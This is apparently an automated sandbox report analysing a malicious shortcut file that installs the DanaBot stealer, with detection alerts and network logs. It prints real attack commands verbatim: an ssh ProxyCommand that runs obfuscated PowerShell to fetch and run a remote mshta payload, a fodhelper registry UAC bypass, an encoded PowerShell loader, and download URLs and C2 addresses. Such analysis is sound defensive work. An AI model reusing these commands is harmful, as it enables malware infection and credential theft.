          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" ., ProcessId: 4204, ProcessName: ssh.exe
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7432, TargetFilename: C:\Users\user\AppData\Local\Temp\r.bat
          Sigma detected: Use Short Name Path in Command Line
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F , CommandLine: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F , CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7652, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F , ProcessId: 7668, ProcessName: reg.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35), CommandLine: powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 4204, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35), ProcessId: 6436, ProcessName: powershell.exe
          Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDCD2A250E1B94DF3BE5873BF3A7890D5E7B8654695D2
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7204, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-27T09:05:12.520857+010020287653Unknown Traffic192.168.2.749699150.241.97.10443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-27T09:06:42.110836+010020344651Malware Command and Control Activity Detected192.168.2.749903188.132.183.159443TCP
          2024-12-27T09:06:43.310390+010020344651Malware Command and Control Activity Detected192.168.2.749908206.206.125.221443TCP
          2024-12-27T09:06:44.453950+010020344651Malware Command and Control Activity Detected192.168.2.74991294.131.118.216443TCP
          2024-12-27T09:06:45.582391+010020344651Malware Command and Control Activity Detected192.168.2.749915188.132.183.159443TCP
          2024-12-27T09:06:53.596487+010020344651Malware Command and Control Activity Detected192.168.2.749939188.132.183.159443TCP
          2024-12-27T09:06:55.532704+010020344651Malware Command and Control Activity Detected192.168.2.749942206.206.125.221443TCP
          2024-12-27T09:06:56.636525+010020344651Malware Command and Control Activity Detected192.168.2.74994794.131.118.216443TCP
          2024-12-27T09:06:57.744654+010020344651Malware Command and Control Activity Detected192.168.2.749949188.132.183.159443TCP
          2024-12-27T09:07:03.248647+010020344651Malware Command and Control Activity Detected192.168.2.749968188.132.183.159443TCP
          2024-12-27T09:07:03.338643+010020344651Malware Command and Control Activity Detected192.168.2.749969206.206.125.221443TCP
          2024-12-27T09:07:03.422521+010020344651Malware Command and Control Activity Detected192.168.2.74997094.131.118.216443TCP
          2024-12-27T09:07:03.509957+010020344651Malware Command and Control Activity Detected192.168.2.749971188.132.183.159443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-27T09:05:28.138283+010028033053Unknown Traffic192.168.2.749731150.241.97.10443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Roaming\mama.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\mama.exeReversingLabs: Detection: 71%
          Multi AV Scanner detection for submitted file
          Source: A4FY1OA97K.lnkVirustotal: Detection: 41%Perma Link
          Source: A4FY1OA97K.lnkReversingLabs: Detection: 34%
          Yara detected DanaBot stealer dll
          Source: Yara matchFile source: 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mama.exe PID: 1532, type: MEMORYSTR
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\mama.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: A4FY1OA97K.lnkJoe Sandbox ML: detected
          Source: unknownHTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.7:49699 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.7:49719 version: TLS 1.2
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 46_2_0306E190 FindFirstFileW,FindClose,46_2_0306E190
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 46_2_0306DBC4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,46_2_0306DBC4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49903 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49908 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49915 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49912 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49939 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49942 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49947 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49949 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49969 -> 206.206.125.221:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49971 -> 188.132.183.159:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49970 -> 94.131.118.216:443
          Source: Network trafficSuricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49968 -> 188.132.183.159:443
          Source: global trafficHTTP traffic detected: GET /ggg.pdf HTTP/1.1Host: pravo-bashkortostan.ruConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /mama.exe HTTP/1.1Host: pravo-bashkortostan.ru
          Source: Joe Sandbox ViewASN Name: PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR
          Source: Joe Sandbox ViewASN Name: HYPEENT-SJUS HYPEENT-SJUS
          Source: Joe Sandbox ViewASN Name: NASSIST-ASGI NASSIST-ASGI
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49699 -> 150.241.97.10:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49731 -> 150.241.97.10:443
          Source: global trafficHTTP traffic detected: GET /aaa.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 150.241.97.10Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: global trafficHTTP traffic detected: GET /aaa.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 150.241.97.10Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ggg.pdf HTTP/1.1Host: pravo-bashkortostan.ruConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /mama.exe HTTP/1.1Host: pravo-bashkortostan.ru
          Source: global trafficDNS traffic detected: DNS query: pravo-bashkortostan.ru
          Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
          Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
          Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
          Source: powershell.exe, 00000010.00000002.1588516515.000001A5A25A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
          Source: svchost.exe, 0000000E.00000002.2534641248.000001FA6F88C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: 77EC63BDA74BD0D0E0426DC8F80085060.34.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: edb.log.14.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
          Source: powershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A45EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A62CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pravo-bashkortostan.ru
          Source: powershell.exe, 00000008.00000002.1303793808.0000026DD62D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1589229169.000001A5A43C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A4876000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1589229169.000001A5A487A000.00000004.00000800.00020000.00000000.sdmp, ggg.pdf.16.drString found in binary or memory: http://www.aiim.org/pdfua/ns/id/
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A45EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: mama.exe, 0000002E.00000003.1690353653.000000007EB44000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2563240393.0000000063469000.00000040.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000003.1694358130.000000007EB1A000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2569666580.000000006E66F000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/V
          Source: mama.exe, 0000002E.00000003.1686533441.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2563240393.0000000063281000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: mama.exe, 0000002E.00000003.1686533441.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2563240393.0000000063281000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlRAND
          Source: 2D85F72862B55C4EADD9E66E06947F3D0.34.drString found in binary or memory: http://x1.i.lencr.org/
          Source: powershell.exe, 00000008.00000002.1314828772.0000026DEE53A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241
          Source: powershell.exe, 00000008.00000002.1303793808.0000026DD6766000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1303793808.0000026DD67C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://150.241.
          Source: mshta.exe, 00000009.00000002.1695531974.000001FC4D776000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671405780.000001FC4D774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1670028016.000001FC4D754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/
          Source: mshta.exe, 00000009.00000002.1695531974.000001FC4D776000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671405780.000001FC4D774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1670028016.000001FC4D754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/L
          Source: mshta.exe, 00000009.00000002.1695409994.000001FC4D754000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1687826620.000002045031D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695579292.000001FC4D792000.00000004.00000020.00020000.00000000.sdmp, A4FY1OA97K.lnkString found in binary or memory: https://150.241.97.10/aaa.mp4
          Source: powershell.exeString found in binary or memory: https://150.241.97.10/aaa.mp4$global:?
          Source: mshta.exe, 00000009.00000002.1695254221.000001FC4D6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4-1-0
          Source: mshta.exe, 00000009.00000002.1700961304.0000020450300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4...
          Source: mshta.exe, 00000009.00000003.1670473228.0000020450342000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1687261023.0000020450359000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1701291403.000002045035B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4...X7o(
          Source: mshta.exe, 00000009.00000002.1695254221.000001FC4D6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp41-0
          Source: mshta.exe, 00000009.00000003.1670028016.000001FC4D729000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D72A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp46)g
          Source: mshta.exe, 00000009.00000003.1670028016.000001FC4D754000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4;
          Source: mshta.exe, 00000009.00000002.1695655072.000001FC4D7B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695254221.000001FC4D6E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1669958089.000001FC4D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4C:
          Source: mshta.exe, 00000009.00000002.1695254221.000001FC4D6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4E
          Source: mshta.exe, 00000009.00000002.1695212616.000001FC4D6D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4H
          Source: powershell.exe, 00000008.00000002.1301938072.0000026DD4568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4PCU
          Source: powershell.exe, 00000008.00000002.1314419679.0000026DEE47C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4U
          Source: mshta.exe, 00000009.00000002.1695362199.000001FC4D71D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1682520730.000001FC4D71D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671976829.000001FC4D71C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4cL
